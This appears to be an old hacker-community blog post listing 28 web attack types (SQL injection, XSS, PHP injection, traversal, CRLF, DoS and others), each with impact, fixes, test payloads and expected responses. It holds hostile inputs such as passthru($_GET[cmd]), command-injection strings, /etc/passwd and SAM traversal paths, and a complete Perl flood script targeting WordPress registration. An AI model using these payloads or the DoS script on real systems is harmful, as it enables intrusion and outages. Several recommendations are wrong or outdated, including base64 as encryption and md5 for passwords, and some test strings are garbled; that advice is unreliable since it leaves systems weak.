1.)SQL injection
a)Description
SQL injection allows an attacker to execute sql commands on the server that he is attacking
b)Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
c)Recommendation
Allow only a-zA-Z0-9 characters
d)Testing string/s
('), (/), (\), (#), (") (--), (-), (*)
e)Response
200 OK, database error messages, redirection to another page
2.)Cross Site Scripting (XSS)
a)Description
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user.
Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
It's XSS because CSS means "Cascading Style Sheets"
b)Impact
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them.
An attacker can steal the session cookie and take over the account, impersonating the user.
It is also possible to modify the content of the page presented to the user.
c)Recommendation
Allow only a-zA-Z0-9 characters or use the function htmlspecialchars(); for php
d)Testing string/s
(), ([script]alert();[/script]), (), ()
e)Response
200 OK, a poup-up message with your cookies
3.)Cross site request forgery (CSRF)
a)Description
Cross-Site Request Forgeries (CSRF) are an almost opposite style of attack. Rather than exploiting the trust that a user has for a Web site, they exploit the trust that a Web site has for a user. In the case of the XSS attacks we just discussed, the user is the victim. In the case of CSRF, the user is an unknowing accomplice.
b)Impact
An attacker may put a link on a forum and when someone clicks the link he will send a message to the server forum.This may couse a flood
c)Recommendation
-Use POST instead of GET method
-Request authorization
-Check the Referer
-Every request has to be unique
d)Testing string/s
Subject:
Message:
This way the attacker will flood the server and he could bypass firewall protection seanse the flooders would be people that don't know what they are doing
e) Response
200 OK, successful redirection
4.)PHP injection
a)Description
PHP code injection is a vulnerability that allows an attacker to inject custom code into the server side scripting engine. This vulnerability occurs when an attacker can control
all or part of an input string that is fed into an eval() function call. Eval will execute the argument as code.
b)Impact
Malicious users may inject PHP code which will be executed on the server side. It's possible to run system commands if the PHP interpreter allows system() or similar functions.
c)Recommendation
Allow only a-zA-Z0-9 characters and set php.ini as it follows:
engine = off
register_globals = off
magic_quotes_gpc = off
magic_quotes_runtime = Off
magic_quotes_sybase = Off
session.use_trans_sid = off
session.use_only_cookies = 1
safe_mode = on
safe_mode_gid = Off
safe_mode_include_dir = Off
safe_mode_exec_dir = Off
allow_url_fopen = off
open_basedir = '/home/sheib/public_html/unsafe' //edit this
file_uploads = off
display_errors = off
log_errors = on
expose_php = off
error_reporing = E_ALL
session.save_path ="/tmp" //edit this if you want
post_max_size = 8M
disable_functions = exec, passthru, proc_open, shell_exec, system, popen, pcntl_fork, pcntl_exec, fsockopen, pfsockopen, socket_bind, socket_accept, socket_listen, socket_create, stream_socket_client, stream_socket_server, dl, glob, posix, include, include_once, require and require_once, fopen, readfile, file, imagecreatefromXXX, phpinfo, eval, chroot, suexec, Limits
*addslashes/stripslashes/magic_quotes_gpc won't help much
*when sending data use $_GET/$_POST and for authentication $_SESSION instead of register_globals
*Don't count on encryption functions like urlencode or base64_encode use md5 hashing
d)Testing string/s
(), (system(base64_decode(YWRtaW4=) #admin), ('.passthru($_GET[cmd]).'&cmd=id), (phpinfo()
e)Responce
200 OK, test, admin, uid...
5.)PERL injection
a)Description
Like php injection, perl injection would be the same but the differences is that you inject perl code not php
b)Impact
Malicious users may inject perl code which will be executed on the server side.
c)Recommendation
Allow only a-zA-Z0-9 characters and use no warnings;
d)Testing string/s
(perl -e system(ipconfig)), (perl -e exec(ipconfig)), (perl -e \'print 'foo'\)
e)Responce
200 OK, Windows IP Configuration, foo
6.)Path disclosure
a)Description
Contains an error message that discloses the installation path and other data.
b)Impact
A remote user can determine the full path to the web root directory and other potentially sensitive information.
c)Recommendation
Allow only a-zA-Z0-9 characters and turn off error messages depending on the script
d)References
http://www.securityfocus.com/infocus/1709 -> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm
e)Testing string/s
(/), (\)
f)Responce
200 OK, Warning message
7.)ASP injection
a)Description
Like php or perl injection, asp injection would be the same but the differences is that you inject asp code not php/perl
*Note*
ASP injection is possbile only on windows machines running IIS
b)Impact
Malicious users may inject asp code which will be executed on the server side.
c)Recommendation
Allow only a-zA-Z0-9 characters and dissable the following functions:
sp_makewebtask
xp_startmail
xp_sendmail
xp_cmdshell
xp_regwrite
d)Testing string/s
(<%@ LANGUAGE = 'JScript' %> <% Response.Write('Test'); %>;)
f)Responce
200 OK, Test
8.)Source code disclosure
a)Description
It is possible to read the source code of a script by using script filename as a parameter. It seems that the script includes a file which name is determined using user-supplied data. This data is not properly validated before being passed to the include function.
b)Impact
An attacker can gather sensitive information (database connection strings, application logic) by analysing the source code. This information can be used to launch further attacks.
c)Recommendation
Analyse the source code of this script and solve the problem.
d)References
http://www.imperva.com/application_defense...disclosure.html -> "Source Code Disclosure" by Impreva
e)Testing string/s
request the file itself
f)Responce
200 OK,
8.Server side includes (SSI)
a)Description
Server Side Includes or SSI is an easy server-side scripting language used almost exclusively for the web. As its name implies, its primary use is including the contents of a file into another, via a Web Server.
SSI is primarily used to "paste" the contents of one or more files into another. For example, a file (of any type, .htm, .txt, etc.) containing a daily quote, could be included into multiple SSI Enabled pages throughout a website, by placing the following code into the desired pages. With one change of the quote.txt file, pages including the snippet will display the latest daily quote. Server Side Includes are useful for including a common piece of code throughout a site, such as a navigation menu.
In order for a web server to recognise a SSI-enabled HTML file and therefore carry out these instructions, the file must end with the .shtml extension. SSI files can also end with .shtm but this depends on the servers ability to recognise the extension.
b)Impact
An attacker can execute commands on the server
c)Recommendation
turn off SSI
d)References
http://en.wikipedia.org/wiki/Server_Side_Includes -> "Server Side Includes" by Wikipedia
e)Testing string/s
f)Responce
200 OK, root, uid....
9.)Code execution
a)Description
Code execution vulnerabilities occur where the output or content served from a Web application can be manipulated in such a way that it triggers server-side code execution. In some poorly written Web applications that allow users to modify server-side files (such as by posting to a message board or guestbook) it is sometimes possible to inject code in the scripting language of the application itself.
b)Impact
A malicious user may execute arbitrary system commands with the permissions of the web server.
c)Recommendation
*Allow only a-zA-Z0-9 characters
*Turn on safe_mode
*Dissable exec, passthru, proc_open, shell_exec, system, popen, pcntl_fork, pcntl_exec
*Set permitions so that only root can execute commands
*Use escapeshellcmd or escapeshellarg
d)References
http://www.securityfocus.com/infocus/1709 -> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm
http://www.owasp.org/index.php/PHP_Top_5 -> "PHP Top 5" by Owasp
e)Testing string/s
(|id|), ($(id)), (; id), (| id), (&& id) (|| id), (> id), (<>
f)Responce
200 OK, uid...
10.File inclusion
a)Description
An attacker could include a remote or local file and execute commands on the server
b)Impact
It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with the privileges of the webserver.
c)Recommendation
*allow_url_fopen = off
*use file_exists(); function to validate if the file is valid
*disable user control
d)References
http://www.php.net/manual/en/features.remote-files.php -> "Using remote files"
http://www.theserverpages.com/10101/21/ -> "Code Injection Vulnerabilities Explained" by The Server Pages
http://www.owasp.org/index.php/PHP_Top_5 -> "PHP Top 5" by Owasp
e)Testing string/s
(http://site.domain/include/test.php), (/file.php)
Where test.php contains:
$t=system('id');
echo "$t";
?>
f)Responce
200 OK, uid....
11.)Directory Traversal
a)Description
Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's root directory.
b)Impact
By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in other directories. As a result, attackers might view restricted files or execute commands, leading to a full compromise of the Web server.
c)Recommendation
*Allow only a-zA-Z0-9 characters only
*Set open_basedir
*Set display_errors to off
d)References
http://www.acunetix.com/websitesecurity/di...y-traversal.htm -> "Directory Traversal Attacks" by Acunetix
http://bg.php.net/features.safe-mode -> "Security and Safe Mode"
http://www.securityfocus.com/infocus/1709 -> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm
http://en.wikipedia.org/wiki/Directory_traversal -> "Directory traversal" by Wikipedia
http://www.imperva.com/application_defense..._traversal.html -> "Directory Traversal" by Imperva
http://cert.uni-stuttgart.de/archive/vulnw...2/msg00007.html -> "phpBB Attachment Mod Directory Traversal HTTP POST Injection" by Paul Laudanski
e)Testing string/s
(../) (../../../../../../../../etc/passwd)
f)Responce
200 OK, directory listening, root
12.)Cross Frame scripting (XFS)
a)Description
This is an attack technique used to trick a user into thinking that fake web site content is legitimate data.
b)Impact
Malicious users may poison a frame allowing them to conduct phishing attacks.
c)Recommendation
Allow only a-zA-Z0-9 characters and verfy the data send by the user
d)References
http://www.nextgenss.com/papers/NISR-WP-Phishing.pdf -> "The Phishing Guide" by Gunter Ollmann
e)Testing string/s
http://your-page.com/grab_data.php
f)Responce
200 OK, http://your-page.com/grab_data.php
13.)CGI security checks
a)Description
CGI security checks are used to see if the Common Gateway Interface of a site is vulnerable to old/new bugs
b)Impact
Malicious users may execute commands or do something else depending on the bug
c)Recommendation
Keep updated your server and software
d)References
http://www.w3.org/Security/faq/wwwsf4.html -> "CGI script security" by Lincoln D. Stein and John N. Stewart
http://www.mirrors.wiretapped.net/security...ng/safe-cgi.txt -> "Safe CGI Programming" by Paul Phillips
http://bau2.uibk.ac.at/matic/cgi2.htm -> "CGI security holes" by Jennifer Myers
e)Testing string/s
/.%252e/.%252e/.%252e/winnt/repair/sam._
/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam
/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam
/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._
/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam
/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam
/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._
/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam
/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._
f)Response
200 OK
14.)Cookie attacks
a)Description
By injecting a custom HTTP header or by injecting a META tag is possible to alter the cookies stored in the browser. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.
b)Impact
By exploiting this vulnerability, an attacker may conduct a session fixation attack. In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server, thereby eliminating the need to obtain the user's session ID afterwards.
c)Recommendation
You need to filter the output in order to prevent the injection of custom HTTP headers or META tags.
Additionaly, with each login the application should provide a new session ID to the user.
d)References
http://www.acros.si/papers/session_fixation.pdf -> "Session Fixation Vulnerability In Web-based Applications" by Mitja Kolsek
http://www.webappsec.org/projects/threat/c..._fixation.shtml -> "Session Fixation" by Web Application Security Consortium
http://www.php.net/session -> "Session Handling Functions"
http://www.cgisecurity.com/lib/CookiePoisoningByline.pdf -> "Hacking Web Applications Using Cookie Poisoning" by Amit Klein
http://www.securityfocus.com/infocus/1722 -> "Penetration Testing for Web Applications (Part Three)" by Jody Melbourne and David Jorm
e)Testing string/s
(Set-Cookie: cookiename=cookievalue) ()
f)Response
200 OK, new cookie that contains your data
15.)Http response splitting/CRLF injection
a)Description
HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If the user input is injected into the value section without properly escaping/removing CRLF characters it is possible to alter the HTTP headers structure.
HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). The attacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response.
b)Impact
Is it possible for a remote attacker to inject custom HTTP headers. For example, an attacker can inject session cookies, spoof mail headers or execute HTML code. This may conduct to vulnerabilities like XSS (cross-site scripting) or session fixation.
c)Recommendation
You need to restrict CR(0x13)(\r) and LF(0x10)(\n) from the user input or properly encode the output in order to prevent the injection of custom HTTP headers.
d)References
http://www.acunetix.com/websitesecurity/crlf-injection.htm -> "CRLF Injection Attack" by Acunetix
http://www.cgisecurity.com/lib/crlf-injection.txt -> "CRLF Injection" by Ulf Harnhammar
http://packetstormsecurity.org/papers/gene...ttpresponse.pdf -> "HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics" by Amit Klein
http://www.securiteam.com/securityreviews/5WP0E2KFGK.html -> "Introduction to HTTP Response Splitting" by dcrab
http://www.cgisecurity.com/papers/header-b...xploitation.txt -> "Header Based Exploitation: Web Statistical Software Threats" by Cgisecurity
http://www.cgisecurity.com/lib/bill/Willia...llamy_GCIH.html -> "TCP Port 80 - HyperText Transfer Protocol (HTTP) Header Exploitation" by William Bellamy Jr.
e)Testing string/s
http://localhost/mail.php?from=foo@foo.com...;message=moofoo
Where our headers will look like:
CC: foo@foo.com
Bcc: foo@foo.com
And if we change our url to
http://localhost/mail.php?from=foo@foo.com&to=mail1, mail2, mail3\r\n&subject=foo&message=moofoo
And we just did a mail spoofing attack
f)Responce
200 OK, changed headers, redirection to another page
16.)Buffer overflow
a)Description
It is almost impossible to find today a buffer overflow in a web application but still there are some scripts that use C\C++\C# code in them
b)Impact
An attacker could execute commands on the server and even get root privileges
c)Recommendation
Analyse the source code of your C\C++\C# program and fix all possible overflows
*For Microsoft Visual C++ .NET you can use /GS (Buffer Security Check) when compiling to see if there are any possible overflows and /Gs (Control Stack Checking Calls) but be careful when using /Gs
d)References
http://www.whitehatsec.com/articles/mythbu...er_overflow.pdf -> "Myth-Busting Web Application Buffer Overflows" by Jeremiah Grossman
http://en.wikipedia.org/wiki/Buffer_overflow -> "Buffer overflow" by Wikipedia
e)Testing string/s
http://webserver/foo.cgi?param1=AAAAAAAAAAAAAAAAA... 5000 A's
f)Responce
500 International Server Errors, 0x41414141 or something simular
17.)Format String
a)Description
Format string attacks are a new class of vulnerabilities discovered around 1999, previously thought harmless. Format string attacks can be used to crash a program or to execute harmful code. The problem stems from the use of unfiltered user input as the format string parameter in certain C functions that perform formatting, such as printf()
b)Impact
A malicious user may use the %s and %x format tokens, among others, to print data from the stack or possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the %n format token, which commands printf() and similar functions to write back the number of bytes formatted to the same argument to printf(), assuming that the corresponding argument exists, and is of type int * .
c)Recommendation
Analyse the source code of your C\C++\C# program and fix all possible overflows
d)References
http://www.webappsec.org/projects/threat/c...ng_attack.shtml -> "Format String Attack" by Web Application Security Consortium
http://en.wikipedia.org/wiki/Format_string_attack -> "Format string attack" by Wikipedia
e)Testing string/s
(%f), (%p), (%n)
http://server/foo.cgi?param1=AAAA%x%x%x%x%x%x%x%x
f)Responce
Error message, something like 0x0804960c and so on...
18.)Integer Overflow
a)Description
In computer programming, an integer overflow is an anomalous condition which may cause a buffer overflow, resulting in a computer security risk where adjacent, valid program control data may be overwritten, permitting the execution of arbitrary, and potentially harmful code.
b)Impact
A malicious user may create a buffer overflow condition and execute commands on the server
c)Recommendation
Analyse the source code of your C\C++\C# program and fix all possible overflows
d)References
http://www.phrack.org/phrack/60/p60-0x0a.txt -> "Basic Integer Overflows" by blexim
http://en.wikipedia.org/wiki/Integer_overflow -> "Integer overflow" by Wikipedia
e)Testing string/s
http://server/foo.cgi?param1=35 65535
f)Responce
Error message, something like 0x0000ffff and so on...
19.)LDAP Injection
a)Description
Lightweight Directory Access Protocol (LDAP) is an open-standard protocol for both querying and manipulating X.500 directory services. When a web application fails to properly sanitize user-supplied input, it is possible for an attacker to alter the construction of an LDAP statement.
b)Impact
When an attacker is able to modify an LDAP statement, the process will run with the same permissions as the component that executed the command. (e.g. Database server, Web application server, Web server, etc.). This can cause serious security problems where the permissions grant the rights to query, modify or remove anything inside the LDAP tree.
c)Recommendation
Allow only a-zA-Z0-9 characters
d)References
http://en.wikipedia.org/wiki/LDAP -> "Lightweight Directory Access Protocol" by Wikipedia
http://www.webappsec.org/projects/threat/c...injection.shtml -> "LDAP Injection" by Web Application Security Consortium
http://www.spidynamics.com/whitepapers/LDAPinjection.pdf -> "LDAP Injection" by Sacha Faust
http://www.ietf.org/rfc/rfc1960.txt -> "A String Representation of LDAP Search Filters" by Tim Howes
http://ldapman.org/ -> LDAP resources
e)Testing string/s
()), (*)
f)Responce
Redirection, error message containing information
20.)XPath Injection
a)Description
This script is possibly vulnerable to XPath Injection attacks.XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.
b)Impact
An unauthenticated attacker may extract a complete XML document using XPath querying. This may compromise the integrity of your database and expose sensitive information.
c)Recommendation
Allow only a-zA-Z0-9 characters
d)References
http://palisade.paladion.net/issues/2005Jul/xpath-injection/ -> "XPath injection in XML databases" by Runa Dwibedi
http://www.webappsec.org/projects/threat/c...injection.shtml -> "XPath Injection" by Web Application Security Consortium
http://www.w3.org/TR/xpath -> "XML Path Language (XPath)" by W3C
http://arxiv.org/PS_cache/cs/pdf/0210/0210026.pdf -> "Encoding a Taxonomy of Web Attacks with Different-Lenght Vectors" by Gonzalo Alvarez and Slobodan Petrovic
http://packetstormsecurity.org/papers/bypa...on_20040518.pdf "Blind Xpath Injection" by Amit Klein
e)Testing string/s
('), (/), (\), (#), (") (--), (-), (*)
f)Responce
Full content of XML document
21.)URL redirection
a)Description
This script is possibly vulnerable to URL redirection attacks. URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they are visiting.
b)Impact
A remote attacker can redirect users from your website to a specified URL. This problem may assist an attacker to conduct phishing attacks, trojan distribution, spammers.
c)Recommendation
Your script should properly sanitize user input.
d)References
http://www.nist.org/news.php?extend.147 -> "Google can be Exploited to Assist Phishing Attacks" by NIST IT SECURITY
e)Testing string/s
('), (/), (\), (#), (") (--), (-), (*)
f)Responce
200 OK, redirection to another page
22.Web Application DoS
a)Description
Web application DoS (Denial of Service) is an attack that sends mutlyple requests with a very large size to a server
b)Impact
Computer crash, service crash, SQL crash
c)Recommendation
Preventing web application dos and not only on web applications isn't that hard but protecting against DDOS (Distributed Denial Of Service) is impossible.Anyway here are some tips:
*Use POST instead of GET
*Make a function that will stop mutlyple POST/GET requests to your site from the same user.If the user makes a requests 3-4 times the stop his ip from requesting anything on your site for 5-10 minutes and log his ip
*POST requests should not be more longer then 8 MB
*When specifying a maxsize value be sure to make a check function so that the attacker can't make it longer then it is
d)References
http://en.wikipedia.org/wiki/Denial-of-service_attack -> "Denial-of-service attack" by Wikipedia
http://www.cert.org/tech_tips/denial_of_service.html -> "Denial of Service Attacks" by CERT
http://cnscenter.future.co.kr/resource/sec...DoS_attacks.pdf -> "Application Denial of Service (DOS) Attacks" by Stephen de Vries
http://www.lasr.cs.ucla.edu/ddos/404_mirkovic_j.pdf -> "Attacking DDoS at the Source" by Jelena Mirkovic, Gregory Prier and Peter Reiher
e)Testing string/s
Here is my wordpress crash exploit:
#!perl
#Greets ot all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev
#The exploit was tested on 10 machines but not all got flooded.Only 6/10 got crashed
use Socket;
if (@ARGV <>
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg; #no http://
for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999;>
{
$user="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S !
$data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB";
$len = length $data;
$foo = "POST ".$dir."wp-register.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+";
}
#s33 if the server is down
print "\n\n";
system('ping $host');
sub usage {
print "\n\t(W)ordpress 2.0.1 ®emote (D)oS (E)xploit (y matrix_killer\n";
print "\te-mail: matrix_k\@abv.bg\n";
print "\tusage: \n";
print "\t$0 \n";
print "\tex: $0 127.0.0.1 /woredpress/\n";
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n";
exit();
};
#Wordpress answer:
#A) DOS shouldn't be handled by a PHP application, there are much more efficient and better ways to deal with this. Registration is off by default, so the severity of this sort of DOS is rather low.
#Well I like giving my own patches or security solutions when I find a bug but this time I agree with the wordpress developers
f)Responce
Server crash, service crash, almost impossible to move your mouse
23.)Hidden field manipulation
a)Description
Hidden fields are used for sending a unique value to the server that cannot be edited by the user.But if the user decides to see the html source hi will see the hidden field and he could change it
b)Impact
A remote attacker can change values to different products(if we are talking about a shop or something simular) or cause a server crash
c)Recommendation
Make a function that will not accept any other value then the one in the hiddien field
d)References
http://www.securityfocus.com/infocus/1704 -> "Penetration Testing for Web Applications (Part One)" by Jody Melbourne and David Jorm
e)Testing string/s
The attacker sees this and saves the html on his hard drive.From then he just changes the value of 7.10 to let's say 2
f)Responce
200 OK, acception of the value from the server
24.)Authentication attacks
a)Description
Authentication plays a very important role in security.We use it to identify someone by a special value, cookie, session or something like that
b)Impact
If an attacker bruteforces or gets somehow the unique identification value of the person he want's then he could authenticate as him
c)Recommendation
*Use SSL on your sites
*When user logs his cookie or whatever it is has to be unique and used only once.That means that when he logouts the cookie has to be destroyd and the next time a new should be created
*Authentication keys should be long and encrypted.Use base64 encryption or md5 hashing
*It would be good to have a ip log function
*Authorization should be required to prevent spoofing/hijacking attacks
d)References
http://www.acunetix.com/websitesecurity/authentication.htm -> "Authentication Hacking Attacks" by Acunetix
http://www.iss.net/security_center/advice/...ing/default.htm -> "Spoofing papers" by Internet Security Systems
http://en.wikipedia.org/wiki/Spoofing_atta...ng_and_phishing -> "Spoofing attack" by Wikipedia
http://www.cs.princeton.edu/sip/WebSpoofing/ -> "Web Spoofing" by Department of Computer Science
http://en.wikipedia.org/wiki/Hijacking -> "Hijacking" by Wikipedia
e)Testing string/s
http://leet.com/login.php?id=4256467
And if there is a id 4256467 you will be logged
f)Responce
200 OK, succesful authentication
25.)Authorization attacks
a)Description
While authentication requires a unique value, authorization requests a username/password value
b)Impact
If an attacker has the username/password value he can log in as the user
c)Recommendation
*Passwords should be long and complex.Atleast 14 characters long and should contain atleast 5-6 special symbols from the keyboard
*Log ip's that make 6 unseccesful login tryes and bann them for 5-10 minutes
*Use md5 hashing
*Use SSL
d)References
http://www.acunetix.com/websitesecurity/authentication.htm -> "Authentication Hacking Attacks" by Acunetix
e)Testing string/s
From then the attacker only tryes different username and password combinations to log in
f)Responce
200 OK, acception of the username and password from the server
26.)Web pilfering/crawling
a)Description
This attack is used to search a hole site or parts of it for password files, hidden fields and other sensitive information
b)Impact
An attacker could get a lot of information about a site and even passwords
c)Recommendation
*Don't hide sensitive data in html
*Check your logs for multyple GET requests
d)References
http://en.wikipedia.org/wiki/Web_crawler "Web crawler" by Wikipedia
http://en.wikipedia.org/wiki/Distributed_web_crawling "Distributed web crawling" by Wikipedia
e)Testing string/s
GET /the_html_document.htlm
.....
f)Responce
200 OK, hidden info
27.)Domain Hijacking
a)Description
This attack is used to take over domain names
b)Impact
An attacker could steal a domain name and from then he could use it for phishing scames
c)Recommendation
See the links below
d)References
http://ccpower.info/dhijacking.html#start -> "Domain Hijacking: A step-by-step guide" by CCpower
http://en.wikipedia.org/wiki/Domain_hijacking -> "Domain hijacking" by Wikipedia
e)Testing string/s
See http://ccpower.info/dhijacking.html#start
f)Responce
Changed domain settings
28.)Google
a)Description
Google attacks are based on found already attacks
b)Impact
It depends on the hole
c)Recommendation
Remove all pages identified by Google hacking queries
d)References
http://ihackgoogle.com -> Google Hacking Database (GHDB)
http://www.acunetix.com/websitesecurity/google-hacking.htm -> "Google hacking" by Acunetix
e)Testing string/s
inurl:passwd.txt site:yoursite.com
f)Responce
200 OK
Final words:
As you can see in almost all of the attacks the best solution is to allow only az-AZ0-9 characters.Well there are other type of protection methods too but they could be bypassed.As an example addslashes could be bypassed with %2527.If you are worring about how much time it will cost you to scan your site for all these attacks well then you could use some of the following scanners:
Acunetix(http://www.acunetix.com/)
MaxPatrol(http://www.maxpatrol.com/)
Nikto(http://www.cirt.net/code/nikto.shtml)
Nessus(http://www.nessus.org/)
WebInspect(http://www.spidynamics.com/products/webinspect/)
Shadow Security Scanner(http://www.safety-lab.com/en/products/1.htm)
GFI LANguard(http://www.gfi.com/lannetscan/)
Typhon(http://www.ngssoftware.com/products/internet-security/ngs-typhon.php)
Greets: Bl0od3r, EcLiPsE, Acid_BDS, Alpha-fan and everyone from h4cky0u.org
No comments:
Post a Comment